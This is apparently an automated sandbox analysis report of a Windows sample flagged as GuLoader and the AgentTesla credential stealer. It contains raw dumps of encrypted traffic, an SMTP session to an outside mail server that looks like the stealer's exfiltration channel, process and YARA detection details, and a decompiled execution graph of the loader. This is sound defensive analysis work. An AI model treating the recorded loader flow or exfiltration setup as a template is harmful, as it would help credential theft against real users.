                                                                                                                    2022-01-28 22:09:04 UTC101INData Raw: bb 03 2d 12 60 13 34 dc d7 04 a4 a9 40 e3 ad dc 9f bb 50 0d b2 e7 36 ac 9c 29 fa 75 86 73 5a 1a 38 05 e9 c6 25 82 20 21 c7 c4 35 10 ac 76 f5 24 bb 0e e1 2d 39 8f 8d f6 96 de e6 67 b0 81 91 ba c7 49 da ae 15 86 3a b0 5d 3d 1f 8f a1 10 d1 00 ca 54 be 5a b1 d8 03 3c 5e a2 79 76 05 08 bc 78 79 7d fe c8 ad 5b 5d 35 41 c9 9f 96 a7 b1 2e ac fe 98 99 ca 72 c8 e9 c6 13 59 f2 10 89 62 d1 f6 df e4 27 ad b0 ce 7a 39 56 b8 91 87 c9 1f 13 60 5d 23 10 38 14 fc ab d5 50 5c c4 0b 20 87 e4 3d 94 5a cd 7b 81 e5 8e 6e 05 99 15 2d 86 4b 1c e6 b6 69 70 8f be a0 ca 57 fd 0c 01 90 f6 3e 81 bf 45 b8 da df 7e 45 90 39 0d f4 b2 bd a0 1c 6b 0a 94 90 68 fc 42 4a 62 64 70 28 f7 39 0b 43 4e 40 1e f6 d8 f5 71 78 0b 2c 30 a3 77 55 38 41 45 0c 67 43 0c 68 19 e0 fd 87 9b a9 8f b0 ab 95 00
                                                                                                                    Data Ascii: -`4@P6)usZ8% !5v$-9gI:]=TZ<^yvxy}[]5A.rYb'z9V`]#8P\ =Z{n-KipW>E~E9khBJbdp(9CN@qx,0wU8AEgCh
                                                                                                                    2022-01-28 22:09:04 UTC109INData Raw: 76 48 48 c2 29 10 e1 7d f0 7c 5f d6 77 e9 87 f5 33 af a2 da 51 fe 32 f7 46 0e f6 c7 29 e9 12 3b e4 c7 24 6f 9c be cf 0c 51 e2 0b ec 9f f1 3d 9a 99 89 64 d8 d9 1b cb 96 31 16 c8 08 a8 a0 1c 7e 6b eb 96 68 e7 60 47 66 b2 a8 06 f8 13 26 a7 90 4e 81 d3 26 e3 5c 72 14 3c 4c f0 77 44 36 83 b9 76 74 50 24 37 94 a1 f7 81 8f be d0 29 eb 95 0a 95 80 31 d7 75 2c 69 e5 d6 04 11 ac e4 fb df a4 66 64 59 19 3b 7b a4 f1 e2 af 46 f7 91 a5 29 6a 43 ab 78 7f 6c 00 b9 cc 16 b5 2f 2f 09 b1 aa 06 75 4c 47 5a f8 f4 b9 b7 da fc b4 f4 34 67 06 4c 98 bf a0 d2 bf 66 68 7d 1d 50 f9 a9 1d fb 09 cd a9 71 f3 1b d9 fa cf 49 3c b5 3e 72 7e a7 10 4a 7e 47 1a 1c 24 ba 60 7f 17 54 31 b7 a9 f6 70 21 f9 5a 23 df 2a a8 11 d3 b8 ab 91 e0 ac a7 d1 fc 19 70 51 ce 7f 87 b8 c4 7b 96 63 48 c7 88 63
                                                                                                                    Data Ascii: vHH)}|_w3Q2F);$oQ=d1~kh`Gf&N&\r<LwD6vtP$7)1u,ifdY;{F)jCxl//uLGZ4gLfh}PqI<>r~J~G$`T1p!Z#*pQ{cHc
                                                                                                                    2022-01-28 22:09:04 UTC117INData Raw: 79 44 ef 51 28 13 01 bd a3 e1 b4 2f 3a 2a bf bb 7e 1a b0 46 5a fe e2 d6 67 f0 eb be 9b c2 64 11 37 cb d1 72 d4 bd 7a 7a c7 1d 50 fb bc 64 54 4c cc a3 1a 0f 19 a4 b4 dd 46 29 ba 2a c6 7e a7 12 58 7e 4e 1a 1c 24 d7 99 03 5e 53 29 dc 79 fa 74 56 dc a5 22 db 2e b9 64 8a b7 d5 d9 8e 95 a2 c0 f9 5d 4f 53 ce 79 94 b3 b7 79 d4 38 66 45 98 72 22 ff 7c 71 25 51 de 16 3d dc c1 e9 c4 89 18 64 14 8c 7c 95 80 14 79 33 e0 0c b3 d4 09 74 ae 0c f9 a6 43 77 13 c3 b8 7d 14 06 2e 6a 33 3b 78 5c 34 7c dc 0d e9 13 b1 05 58 5e 46 fc ef 33 56 40 a7 d4 64 b8 64 49 b4 ae 93 b0 34 d4 42 47 bf 53 35 4d 86 e8 17 76 30 08 4c c2 0e 2e f4 74 a7 0d 8e 59 10 1c d5 92 bc dc 4b bc 56 1d 37 d0 88 c6 d8 1c 3f 23 69 31 26 23 0a 25 f0 eb 2e 2c 02 fd 67 32 e4 6a 49 ce 74 27 83 c6 95 b7 c3 03 7f
                                                                                                                    Data Ascii: yDQ(/:*~FZgd7rzzPdTLF)*~X~N$^S)ytV".d]OSyy8fEr"|q%Q=d|y3tCw}.j3;x\4|X^F3V@ddI4BGS5Mv0L.tYKV7?#i1&#%.,g2jIt'
                                                                                                                    2022-01-28 22:09:04 UTC125INData Raw: 9f 97 2e 49 5f 39 e6 03 7b 3c 28 b6 4f 18 02 b2 7e 8f 76 b3 2b cb c4 bf 14 48 47 01 fb ef 33 56 6c 34 ba 92 a1 65 4d 9e cc 9c 95 1c 79 67 6a a4 66 01 d9 be e8 17 5c 35 00 5d c8 05 d0 ca 7c b6 01 b5 c8 50 f0 2a 6d 47 ed e3 ab 80 0e b8 e4 b0 c5 e8 b2 35 1c 82 cc f9 3d 04 0f f0 b5 17 04 2f ff 67 34 ce bf 37 57 75 2c 87 e6 2b e9 c3 03 e5 d7 6d 0e e5 a3 3e 4f 88 14 d9 fd d5 1e f5 e9 dd c1 eb 3e 60 a9 59 9b a4 c8 0c 88 f5 8c a9 4c 10 cb d7 61 c7 9d a2 f1 da a1 41 71 54 9e 86 59 0b da 22 6a 14 5c 10 0b bb 3b b2 12 b5 29 32 69 10 b6 48 37 34 2c 64 69 47 67 94 c1 23 44 bc c6 34 5e ce 46 88 40 ba 49 a2 93 81 4b 90 49 d5 39 75 39 0b 7e 88 17 ef ab 0d 8a 35 b9 40 d3 89 3a cf 26 7b bf 7b 28 9b af 68 0d 21 0f 5b 62 6e 39 61 5a 8f d8 01 05 73 bc 35 dc c7 86 cf 88 ab c0
                                                                                                                    Data Ascii: .I_9{<(O~v+HG3Vl4eMygjf\5]|P*mG5=/g47Wu,+m>O>`YLaAqTY"j\;)2iH74,diGg#D4^F@IKI9u9~5@:&{{(h![bn9aZs5
                                                                                                                    2022-01-28 22:09:04 UTC133INData Raw: 30 7c 55 44 ea 95 ac fc 67 a1 47 5b f6 e9 16 58 0b c4 2a ee 17 5c 16 bb 18 68 3a 35 95 84 13 a9 10 96 f2 b5 11 01 68 67 4a a5 94 c7 09 e6 cf 56 35 5e d5 47 0a 6c b8 49 3e 9c 2a 24 2f 68 7f 3c 55 f8 2b bc 90 8d ca 98 37 81 17 78 46 f9 0f 64 78 2e 7b bb 44 8c b2 82 6a 97 02 08 cb 3a d7 93 60 5e af 3a cb 1d 73 26 0f ed fe 8d ed 4a ad ea 7f 81 a8 66 a6 b2 f6 cb ab d4 9e 98 5d dc b4 60 1e cc db 49 72 51 4f 4c 9d e4 e2 e0 ef 6c 81 4f fe 0e 91 70 81 bc 07 1c 74 fe 89 a3 01 31 b2 6c 5e 7c c3 57 77 d1 6d 86 a9 6a dc 8c bb 1a 67 47 da 71 fc 83 e6 4a e7 1d b3 6c b6 ff f4 2a 93 aa 40 3c 2f a0 d0 27 6e a1 ee b7 98 ad d9 29 54 46 57 d4 58 4a 6e e1 df d6 e4 76 cd 88 17 c1 2b f7 ff ba a3 c1 ba cc 10 3a b8 7e 8a 0f d9 70 12 53 c0 08 f9 9b d0 44 b4 b2 58 68 8e 20 f9 11 0e
                                                                                                                    Data Ascii: 0|UDgG[X*\h:5hgJV5^GlI>*$/h<U+7xFdx.{Dj:`^:s&Jf]`IrQOLlOpt1l^|WwmjgGqJl*@</'n)TFWXJnv+:~pSDXh
                                                                                                                    2022-01-28 22:09:04 UTC140INData Raw: 4e f8 20 33 99 1a bd 07 82 71 7e 99 85 21 3c 95 41 4f 7a 30 dc 76 d1 75 8e 87 71 dc 8a 8f b0 34 dc db 77 d2 25 00 d1 e6 1d 2d 69 35 ef d2 0a 91 8d 6d 2e 29 55 58 26 6e b6 e6 91 83 ad df 1c df 10 e3 d7 58 48 64 fa a3 4f e5 ec ec 85 a9 e6 0b 6e 67 9f 8e f0 4a ca bf 3b a0 56 87 19 c0 76 38 cc 96 bc fa 9b d2 4e ac ce c1 69 14 01 f4 b0 29 89 69 c4 bb 08 b6 5c 07 51 b9 37 f6 24 be 00 13 b0 5c 91 53 0f 9a 9b 7c 23 55 3f 85 61 61 cc af f5 2e a3 40 a3 ab f3 39 06 ee 06 bc 16 ff bd 1c 22 c6 e3 41 84 df ac 28 85 35 46 cb f6 47 ba 9c 69 c8 96 7b 32 84 2c 0b 21 59 ae 57 46 32 1f 68 71 c0 0f 0a 31 ea c7 c4 3b 16 2e 7e e6 20 21 3a c8 23 14 51 11 d8 87 dc bd ae 97 81 95 ab 80 37 d9 ae 19 a0 a7 c2 d7 38 1f 9a 85 95 2d 01 e6 e6 99 0c 88 ff 23 a6 74 f9 78 56 ed 06 5e 7c 67
                                                                                                                    Data Ascii: N 3q~!<AOz0vuq4w%-i5m.)UX&nXHdOngJ;Vv8Ni)i\Q7$\S|#U?aa.@9"A(5FGi{2,!YWF2hq1;.~ !:#Q78-#txV^|g
                                                                                                                    2022-01-28 22:09:04 UTC148INData Raw: 51 3b fa c5 bf 1c 49 20 19 d0 3f 83 2c a3 56 34 9d bc 65 ec bf 88 52 2f a5 35 61 93 1d 23 09 4c 63 a9 3e 69 39 ed 58 f7 f1 23 a7 49 b1 bf fe d1 88 90 26 ca 66 f7 bf 0a 2e d6 fe 63 ca 4b 95 11 a9 49 8e 92 d6 73 6d 3e 79 24 b7 ff cb c9 f4 bd 15 95 ec 48 c7 61 fc 1a 67 06 f8 f0 5e 63 5d b6 37 ad 58 c2 99 43 66 33 a7 38 2a 6a 45 6c 55 11 1b a8 18 80 3c 36 68 02 f5 bb f7 b3 5f 53 88 c8 93 e7 ab 42 dc d5 c6 1c 31 d7 69 a4 79 d8 15 d5 c9 30 ef ed ec 68 28 5b c3 67 96 da 01 1a 33 10 3e 03 26 0f b5 41 c4 7e 49 93 4d 00 ad d0 15 fa c9 fb 2a ae 86 8e 27 24 b7 39 0b dd 22 28 da df 18 49 f0 95 d1 86 08 f7 39 c5 b0 15 ef 54 13 5b 6a 06 11 89 5b 4b aa dc 64 c9 15 10 8a e1 b0 33 68 bb 3f 9f 8f bd 58 88 c3 29 de e0 8f ae bb 72 3f 31 24 b5 9e fb c1 c9 45 af 82 ce b6 4c f9
                                                                                                                    Data Ascii: Q;I ?,V4eR/5a#Lc>i9X#I&f.cKIsm>y$Hag^c]7XCf38*jElU<6h_SB1iy0h([g3>&A~IM*'$9"(I9T[j[Kd3h?X)r?1$EL
                                                                                                                    2022-01-28 22:09:04 UTC156INData Raw: 2f 24 db 4d 75 45 c9 80 f7 6f d6 cf b1 44 56 2a 04 66 70 6a 5a a7 37 9e 32 1e 97 56 31 ef be 68 c2 f7 92 0a ce a4 ea 23 5e d9 54 0f b1 7d 60 98 f2 0a 00 f1 cc ce ae 16 8a 6b 9c e2 a6 47 e3 e8 ca c9 a8 a5 4f a9 e8 43 53 b6 1b b2 a5 00 33 2b 8b 9b 6a fa 4b 41 7a d2 42 0c ee 37 09 4f 52 73 8d c8 c9 c4 6f 6b 00 3f 20 fd 43 6d 14 78 87 2d 70 6e 47 32 29 c5 d2 a2 a4 91 cc 9e 9d be 1e a6 d4 d2 e4 73 0c 65 dd fb 36 38 95 22 15 74 a9 ad a5 8b bc d0 d4 b5 3f 31 6c bc 20 15 53 f0 b8 91 77 88 92 c9 de 46 1e c3 6d ee e7 c7 7a 4d 94 9d aa ac a2 08 16 4d 5d 1b 02 7d 10 cd 92 ca c4 2b 44 52 3f 01 a2 e6 c9 e5 b2 07 4a 92 43 e7 57 24 f2 74 83 2f 3f 49 fb bd 3f d1 ba c8 3d 85 db ac 0f 8d 84 b2 3f bb be c9 cb a9 68 2c 52 d5 f9 3c f0 8b 64 8f 1a d9 61 16 02 37 25 0e 1e 6a 40
                                                                                                                    Data Ascii: /$MuEoDV*fpjZ72V1h#^T}`kGOCS3+jKAzB7ORsok? Cmx-pnG2)se68"t?1l SwFmzMM]}+DR?JCW$t/?I?=?h,R<da7%j@
                                                                                                                    2022-01-28 22:09:04 UTC164INData Raw: 66 64 53 39 33 83 77 e2 e2 80 6c c6 1b a5 29 68 43 a2 7b 53 06 12 b7 e9 16 b5 2f 3c 39 b1 aa 75 6d 6f 62 ab fa d1 b9 b5 f2 eb b4 f7 3e 23 12 6e d7 10 af f3 bd 70 15 3b 1c 53 fd ed 08 d3 45 dd a6 50 f1 18 a4 b2 ce 4a 38 f1 46 5e 74 1c 1b 6b 11 9c 18 1c 2e bb 65 04 46 76 14 42 a9 dd 74 5c b3 5b 23 d8 28 ec 69 c4 b2 05 9a aa 95 a6 d1 f6 75 50 51 88 7c d2 b3 d5 54 f3 38 60 56 88 63 31 f7 55 5a 43 5a 63 08 08 cd cd c1 ea 8c 1b 62 3a ba 5d b0 77 3e b0 31 e0 06 dc f0 08 74 ee 1e b6 bc 8a 50 18 c6 b8 7b 3c 28 2f 6a 73 10 c1 55 fb 79 96 2b eb 13 b7 14 4b 5d 6f d5 89 38 2c 49 93 c4 50 3a 65 49 be 70 8d 8d 35 c6 c4 47 90 40 95 47 be e8 17 7c e8 10 7e ed 0a f8 c2 7e ce 9d 9f 4e 2e 69 38 6d d4 cc b8 a4 a5 0e 1a 5a 9d d7 ce 92 99 1c 8d cb 5f dc 29 0f 10 34 1a 2c 02 fd
                                                                                                                    Data Ascii: fdS93wl)hC{S/<9umob>#np;SEPJ8F^tk.eFvBt\[#(iuPQ|T8`Vc1UZCZcb:]w>1tP{<(/jsUy+K]o8,IP:eIp5G@G|~~N.i8mZ_)4,
                                                                                                                    2022-01-28 22:09:04 UTC172INData Raw: 3f 44 7c e8 86 5d 9a 33 e0 06 dc 66 0b 85 bd fb eb ca 48 dd 32 c4 b8 7b 3c be 2c 2b 36 f5 96 23 34 d5 bc 29 eb 13 b7 82 48 a9 3f 30 ef 4e 50 82 b9 c6 0b a0 65 df be 1b 9f 73 1e 9e 42 a1 ba 42 21 65 be 7e 17 4d f9 ee 5f b5 19 ff f7 7c b6 07 9f d8 2e fc 28 8b 41 b0 5e 82 90 0c 22 c1 9d 41 ce c9 9f fa 80 b1 d9 97 1c 0d f0 aa 1a ba 02 22 64 d4 e6 44 49 a2 64 2e 83 c6 95 7f c3 a1 67 14 42 61 c3 0e 90 4d 88 14 f9 85 dd 17 f1 10 c4 94 c6 92 70 ad 73 19 da c7 0d e6 eb 4a 14 31 10 1b 5d 46 ea 8c 84 47 65 92 45 97 76 ea 8f a8 1b c2 0a 47 16 ca 16 0c 26 a3 29 6e b5 3f 03 ab 10 b6 48 3b 11 66 72 a9 65 da 94 f2 32 66 b1 cf 34 c8 d1 9c bf 8b ba 34 a4 ed 16 37 09 48 d5 ab 55 69 0f 98 8a f0 ca f3 0e ae 15 78 40 45 89 02 c0 c9 79 c2 64 b1 a2 80 6a 0d 27 b3 d9 a7 f3 de 63
                                                                                                                    Data Ascii: ?D|]3fH2{<,+6#4)H?0NPesBB!e~M_|.(A^"A"dDId.gBaMpsJ1]FGeEvG&)n?H;fre2f447HUix@Eydj'c
                                                                                                                    2022-01-28 22:09:04 UTC180INData Raw: b3 c4 3c 60 af e5 19 dd 52 eb 8a 8c ac 7b 16 12 cb 4d 44 7c 8c 6f c4 83 a3 3c 71 fb cd 8d 59 0b c0 9c 47 27 5f f0 23 40 45 9a 49 b7 2d 12 a9 86 b6 a6 bb f7 03 0b 4f b4 fd 96 c1 23 64 27 cf 51 5d 37 65 dd 6d 4c 13 a6 b9 07 35 9f 48 fe 2a b3 fa 76 7e 9e d6 c8 86 1f ac 83 78 cf d0 6f 18 9c 2f 43 e4 66 27 b3 82 fc 0d 72 32 3f 1e 8a 38 3b 05 ad 1a 01 05 e5 26 a9 f2 30 a2 92 4a d0 9b fb ff 31 67 30 b6 03 70 4c d6 e3 02 e4 aa a4 46 3e 60 4c 49 71 75 4f 56 e0 e4 40 a6 c5 41 83 4f 6e 24 c5 17 fe bf 7a 18 8a 08 8a a3 01 ab 01 41 62 5e 05 f8 0b d1 92 fd a8 73 dc 8c 33 32 5b 5e 3c 75 ab 05 b8 8f e4 1d b7 4c 8e fe a3 2e ef 8d 10 2e 48 dc 7c 26 6e a1 58 bc 65 b2 3f 34 20 6e 19 8a 5a 4c 44 63 37 4f 6e 72 2f aa c5 c0 af ab 67 9f 8e d0 0a ec b1 1a 5e 7c d7 1b 65 2c 10 4e
                                                                                                                    Data Ascii: <`R{MD|o<qYG'_#@EI-O#d'Q]7emL5H*v~xo/Cf'r2?8;&0J1g0pLF>`LIquOV@AOn$zAb^s32[^<uL..H|&nXe?4 nZLDc7Onr/g^|e,N
                                                                                                                    2022-01-28 22:09:04 UTC187INData Raw: 30 60 da 9a 7b b3 a7 54 9d 07 d2 3f c9 41 83 cc d7 e8 0e 0e 18 65 04 d4 49 53 88 77 19 67 8a 41 4f 77 e1 2a 6b d1 6d 33 ac a5 c1 8c a5 21 57 9f c7 77 d6 3b b1 db f8 1d b7 cf 35 f2 ea 2a 09 a7 46 22 17 80 7e 77 45 ad d0 bc 81 ac d2 3e 43 6e 7a 8c 54 9c 59 63 a1 60 e8 b4 c7 a8 b8 c9 24 3b 78 9f 8e c3 b6 2e b1 3b b8 eb ac cd dd 70 12 5d f5 ff e6 9b d6 b4 2a 1a dc 69 8e f8 f3 63 01 a9 f3 1f 91 ca 98 84 21 80 96 e2 d0 09 bc 99 36 58 d0 ef ca 95 97 5d 52 b8 57 c9 88 39 4a e1 be 3e 07 fa 4c a3 ab 97 cd 28 f0 06 a4 bb da b7 02 24 ec 54 0b d1 c3 ac 2c 62 bc 4c d5 f6 dd b1 af 70 f0 b6 e7 af 8b e0 36 fa 7f 00 76 6f 04 32 6a 5a da e7 86 4f 73 b1 ca 05 28 b3 7c 0a 2c 79 11 e5 32 74 6e 4e d4 87 dc 41 7d 61 9c 95 bc 66 12 e1 b0 1f 8a 79 b4 74 27 1f 9e 5c 18 1e 1e e6 7c
                                                                                                                    Data Ascii: 0`{T?AeISwgAOw*km3!Ww;5*F"~wE>CnzTYc`$;x.;p]*ic!6X]RW9J>L($T,bLp6vo2jZOs(|,y2tnNA}afyt'\|
                                                                                                                    2022-01-28 22:09:04 UTC195INData Raw: f2 de bc be 6f e8 eb 2f ef 3e 4b ed fb 23 84 ca 8c 43 57 2c d7 c3 d3 a2 49 ee 45 cd 3e 96 d6 1c 61 85 61 79 74 de eb 45 a5 e1 2d cb 97 b4 9f d3 11 ee d5 8e 30 e0 45 2b 9f 16 ae 31 33 1a 55 03 71 96 51 fa 1b 1c 95 b0 4d 5f dd 1b b3 4e d2 1f b0 40 5b 71 ce b0 87 9f f7 4f f5 eb 95 f9 c2 1a 9d c4 1f cd 4f bc 06 53 1f ff cf 0b 4d 6b e6 1f d6 21 fd b3 03 5d 1c f9 1e 1c 0f 47 34 7c 3b 10 d6 3b c4 5b 13 76 65 8c f4 9c 8e 42 2e eb 9f f7 83 a0 72 a3 a4 da 62 36 f2 40 fe 04 b0 6b 9d a9 44 c3 a9 87 18 52 52 b0 0f f3 96 56 6d 00 3d 6b 7f 4a 7b eb 01 a6 1d 31 af 7e 4b f5 98 7f e0 ca ad 3b d3 8b 9a 25 6f 99 45 59 88 76 6e 80 d3 17 03 de d6 cf b8 38 e2 65 94 91 bd 4f fc c8 e2 dd b4 8a 74 bd fb 39 61 a5 67 da cb 1c 13 61 f3 cb 03 8f 29 3e 68 e9 14 70 a7 72 69 28 25 40 d1
                                                                                                                    Data Ascii: o/>K#CW,IE>aaytE-0E+13UqQM_N@[qOOSMk!]G4|;;[veB.rb6@kDRRVm=kJ{1~K;%oEYvn8eOt9aga)>hpri(%@
                                                                                                                    2022-01-28 22:09:04 UTC203INData Raw: e5 df cf 7a c2 dd d6 04 7d f3 00 83 6d df 08 d5 85 51 81 88 89 16 49 27 a3 0f f5 c9 15 08 78 4e 35 18 3a 11 eb 5b 99 05 71 9d 68 54 eb 9c 5a e8 d0 a5 38 ff e7 f5 42 0c 99 03 0a e5 19 1d e1 f1 1c 40 c9 c9 c5 a9 53 e2 05 f7 91 c8 3e 9b 96 a1 b2 97 a0 3f 8f f5 5b 54 ab 15 cb c9 7f 11 77 87 94 6c ea 44 57 60 9e 71 05 e4 05 0f 67 4f 42 8f d9 df f7 78 7a 17 07 23 af 72 43 3e 4d 8e 05 4d 51 25 21 2d f1 ce 85 ad a1 f2 90 ae 92 08 99 e7 e8 f5 75 28 40 ee dc 32 0d a1 e6 e3 b0 6c 76 65 53 21 33 10 7c f0 fc a5 6b e6 80 a4 37 68 5d e6 7d 49 13 1f b7 cb 26 b4 2e 3d 29 ac aa 74 55 48 46 54 f6 fa b7 d4 f3 eb 80 a7 47 16 65 54 b1 90 f7 b3 df 5e 46 5e 6e 26 94 c8 6e f5 60 9c db 1a 85 77 c7 dd a2 3a 16 e4 2a 5b 0f ef 60 3a 61 df 74 75 4b d6 11 52 2c 3a 45 dc c8 97 18 4e f0
                                                                                                                    Data Ascii: z}mQI'xN5:[qhTZ8B@S>?[TwlDW`qgOBxz#rC>MMQ%!-u(@2lveS!3|k7h]}I&.=)tUHFTGeT^F^n&n`w:*[`:atuKR,:EN
                                                                                                                    2022-01-28 22:09:04 UTC211INData Raw: ef e9 c7 f7 23 57 6b db 3e 8f ac e0 e0 a1 e9 ca 60 53 3e 38 08 72 f7 f3 26 ed f0 81 a4 22 79 c0 67 7f 4e 13 06 a6 4f 97 ac 28 28 3b b9 b6 7b 7d 51 56 da 5c fc a5 bf ee e1 be e8 36 62 16 39 d4 b6 a8 d2 a0 61 95 93 18 4d ec 2b af 82 4e cd a7 7e f5 38 a5 b0 c5 5d 3f ba 58 26 77 a5 1c 46 0d 94 05 1f 26 a5 79 1f 42 48 33 bb ac ff 71 54 bd 53 2b d3 2d 8a 68 95 b1 a5 9f 88 93 ba cc f8 68 5d 59 c6 77 8e bf c7 46 d3 25 65 44 08 92 18 f0 04 4c 35 d0 41 06 3f 4c 8d d9 e4 90 0a 0f 34 ac 63 90 94 bd d5 39 f2 6b ce 70 bf 7a b5 18 e1 bf 5a 36 35 db b6 73 34 20 24 6f 15 11 95 46 36 7d b3 2e e3 0b b9 1c 40 4d 3b 56 59 3a 70 44 b7 d5 88 31 74 ca 2b 7c 9d 95 1f e3 42 47 b4 40 21 65 be e8 1b 7d ee 0b 5d c8 19 fa e7 7e b6 07 9f 40 2e 6f 23 7f c3 79 50 a3 90 06 3f c4 8d df d8
                                                                                                                    Data Ascii: #Wk>`S>8r&"ygNO((;{}QV\6b9aM+N~8]?X&wF&yBH3qTS+-hh]YwF%eDL5A?L4c9kpzZ65s4 $oF6}.@M;VY:pD1t+|BG@!e}]~@.o#yP?


                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                    Jan 28, 2022 23:10:55.464364052 CET5874983046.16.58.183192.168.11.20220 vxadc-30.srv.cat ESMTP
                                                                                                                    Jan 28, 2022 23:10:55.464689016 CET49830587192.168.11.2046.16.58.183EHLO 367706
                                                                                                                    Jan 28, 2022 23:10:55.494700909 CET5874983046.16.58.183192.168.11.20250-vxadc-30.srv.cat
                                                                                                                    250-PIPELINING
                                                                                                                    250-SIZE 47185920
                                                                                                                    250-ETRN
                                                                                                                    250-STARTTLS
                                                                                                                    250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5
                                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                                    250-8BITMIME
                                                                                                                    250-DSN
                                                                                                                    250 CHUNKING
                                                                                                                    Jan 28, 2022 23:10:55.495059013 CET49830587192.168.11.2046.16.58.183STARTTLS
                                                                                                                    Jan 28, 2022 23:10:55.524951935 CET5874983046.16.58.183192.168.11.20220 2.0.0 Ready to start TLS

                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:2
                                                                                                                    Start time:23:08:43
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Users\user\Desktop\9TpV4rfMmJ.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\9TpV4rfMmJ.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:166200 bytes
                                                                                                                    MD5 hash:38034F18AF511C3B04B25170735E8B8E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low

                                                                                                                    Target ID:4
                                                                                                                    Start time:23:08:54
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\9TpV4rfMmJ.exe"
                                                                                                                    Imagebase:0x360000
                                                                                                                    File size:108664 bytes
                                                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate

                                                                                                                    Target ID:5
                                                                                                                    Start time:23:08:54
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\9TpV4rfMmJ.exe"
                                                                                                                    Imagebase:0x920000
                                                                                                                    File size:108664 bytes
                                                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.250546924581.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.255513838667.000000001DEE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                    Reputation:moderate

                                                                                                                    Target ID:6
                                                                                                                    Start time:23:08:54
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff617d90000
                                                                                                                    File size:875008 bytes
                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:15.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:16.4%
                                                                                                                      Total number of Nodes:1552
                                                                                                                      Total number of Limit Nodes:28
                                                                                                                      execution_graph 4078 401941 4079 401943 4078->4079 4084 402da6 4079->4084 4085 402db2 4084->4085 4130 40657a 4085->4130 4088 401948 4090 405c49 4088->4090 4172 405f14 4090->4172 4093 405c71 DeleteFileW 4095 401951 4093->4095 4094 405c88 4096 405db3 4094->4096 4186 40653d lstrcpynW 4094->4186 4096->4095 4215 406873 FindFirstFileW 4096->4215 4098 405cae 4099 405cc1 4098->4099 4100 405cb4 lstrcatW 4098->4100 4187 405e58 lstrlenW 4099->4187 4102 405cc7 4100->4102 4104 405cd7 lstrcatW 4102->4104 4105 405ccd 4102->4105 4107 405ce2 lstrlenW FindFirstFileW 4104->4107 4105->4104 4105->4107 4111 405da8 4107->4111 4128 405d04 4107->4128 4108 405dd1 4218 405e0c lstrlenW CharPrevW 4108->4218 4111->4096 4112 405d8b FindNextFileW 4116 405da1 FindClose 4112->4116 4112->4128 4113 405c01 5 API calls 4115 405de3 4113->4115 4117 405de7 4115->4117 4118 405dfd 4115->4118 4116->4111 4117->4095 4121 40559f 24 API calls 4117->4121 4119 40559f 24 API calls 4118->4119 4119->4095 4123 405df4 4121->4123 4122 405c49 60 API calls 4122->4128 4125 4062fd 36 API calls 4123->4125 4124 40559f 24 API calls 4124->4112 4127 405dfb 4125->4127 4127->4095 4128->4112 4128->4122 4128->4124 4191 40653d lstrcpynW 4128->4191 4192 405c01 4128->4192 4200 40559f 4128->4200 4211 4062fd MoveFileExW 4128->4211 4145 406587 4130->4145 4131 4067aa 4132 402dd3 4131->4132 4163 40653d lstrcpynW 4131->4163 4132->4088 4147 4067c4 4132->4147 4134 406778 lstrlenW 4134->4145 4135 40668f GetSystemDirectoryW 4135->4145 4139 40657a 10 API calls 4139->4134 4140 4066a2 GetWindowsDirectoryW 4140->4145 4141 406719 lstrcatW 4141->4145 4142 40657a 10 API calls 4142->4145 4143 4067c4 5 API calls 4143->4145 4144 4066d1 SHGetSpecialFolderLocation 4144->4145 4146 4066e9 SHGetPathFromIDListW 